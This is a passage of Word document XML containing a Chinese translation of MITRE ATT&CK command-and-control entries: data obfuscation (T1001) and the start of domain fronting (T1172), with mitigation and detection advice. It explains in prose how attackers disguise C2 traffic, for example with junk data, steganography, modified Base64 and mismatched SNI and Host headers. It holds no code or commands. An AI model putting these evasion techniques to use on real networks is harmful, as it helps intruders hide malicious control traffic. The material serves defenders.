            </w:r>
            <w:r w:rsidRPr="00242E26">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>C2</w:t>
            </w:r>
            <w:r w:rsidRPr="00242E26">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>签名或构建协议，以避免被常见的防御工具检测到。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C1D61FD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E67136" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E450459" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C49137" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E67136">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析不常见数据流的网络数据（例如，客户端发送的数据明显多于从服务器接收的数据）。</w:t>
      </w:r>
      <w:r w:rsidRPr="00E67136">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E67136">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用通常不具有网络通信或从未见过的网络的过程是可疑的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00E67136">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E67136">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析数据包内容以检测不遵循正在使用的端口的预期协议行为的通信。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1200A1A8" w14:textId="636D8663" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="00A0413E" w:rsidP="003D0094">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>混淆</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="003D0094" w:rsidRPr="00A65911" w14:paraId="6DB776BB" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D46733D" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="003D0094" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>T1001</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52BFB065" w14:textId="003EFFF1" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="003D0094" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="00F743F9">
              <w:t>命令与控制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EDEE63D" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="003D0094" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="683379F0" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="003D0094" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>数据源：网络抓包，网络进程使用，进程监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络协议</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>分析</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19D9ECD8" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="003D0094" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>是否需要网络：是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="585FC939" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="003D0094" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:lastRenderedPageBreak/>
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3252DAC5" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="003D0094" w:rsidP="003D0094">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F9F94B4" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="003D0094" w:rsidP="003D0094">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>可能会试图隐藏</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（但</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>不一定加密</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>&amp;C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通信来使得内容更难以被发现或解密，使得通信不那么明显，并防止命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>被看到</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。方法有</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>多种多样</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，例如添加垃圾数据到协议流量，使用隐写术，混合合法流量和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>&amp;C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通信流量，或使用非标准数据编码系统（例如使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>修改的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>ase64</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>来对</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求消息主体进行编码）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18188EC4" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="003D0094" w:rsidP="003D0094">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7189"/>
      </w:tblGrid>
      <w:tr w:rsidR="003D0094" w:rsidRPr="003D0094" w14:paraId="79BFE0D6" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0129B2B9" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="003D0094" w:rsidRDefault="003D0094" w:rsidP="003D0094">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D0094">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="37BA1B8E" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="003D0094" w:rsidRDefault="003D0094" w:rsidP="003D0094">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D0094">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0094" w:rsidRPr="00A65911" w14:paraId="2AB014B3" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="1276"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51217DA2" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId237" w:history="1">
              <w:r w:rsidR="003D0094" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>网络入侵防御</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CDD8E7D" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="003D0094" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用可以通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>网络签名来识别</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>特定</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>攻击者恶意软件流量的</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>入侵检测</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>防御系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来缓解网络级别活动的影响。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4016CED9" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="003D0094" w:rsidP="003D0094">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="460A4109" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="003D0094" w:rsidP="003D0094">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FB4E89" w14:textId="7BC96824" w:rsidR="003D0094" w:rsidRPr="003D0094" w:rsidRDefault="003D0094" w:rsidP="003D0094">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析网络数据中不常见的数据流（例如，一个客户端发送的数据比从服务器接收的数据要多得多，或者一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>客户端给另外一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不应该或经常不相互通信的客户端发送了</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>数据</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。如果以前</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>不和网络通信的进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>使用了网络，或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出现了</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>以前</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从未</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>见过的进程，则是可疑的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析数据包内容来检测未遵循所使用端口的预期协议而</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的通信。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1D09FC" w14:textId="4912542E" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="00A0413E" w:rsidP="003D0094">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>域</w:t>
      </w:r>
      <w:r w:rsidR="003D0094">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>前置</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="003D0094" w:rsidRPr="00A65911" w14:paraId="5D1DE9C5" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4814FFAF" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="003D0094" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>T1172</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68A1AF38" w14:textId="2CEB405A" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="003D0094" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="00F743F9">
              <w:t>命令与控制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DCBDE99" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="003D0094" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31275299" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="003D0094" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>SSL/TLS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检查</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，网络抓包</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C988834" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="003D0094" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>是否需要网络：是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12AE1DD1" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="003D0094" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Matt Kelly</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>@breakersall</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CBA961F" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="003D0094" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F9E017B" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="003D0094" w:rsidP="003D0094">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BABC07F" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="003D0094" w:rsidP="003D0094">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域名前置技术利用内容交付网络（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CDN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）及其他拥有</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>多个</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>路由</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方案来混淆</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流量或通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通道传输的流量的预期目的地。该技术涉及在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TLS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SNI</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Host</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段中使用不同的域名。如果两个域来自同一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CDN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CDN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以在解开</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TLS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头后路由到</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头中指定的地址。该技术的变体，“无域名”前置，将</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SNI</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段留空。即使</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CDN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试来验证</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SNI</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
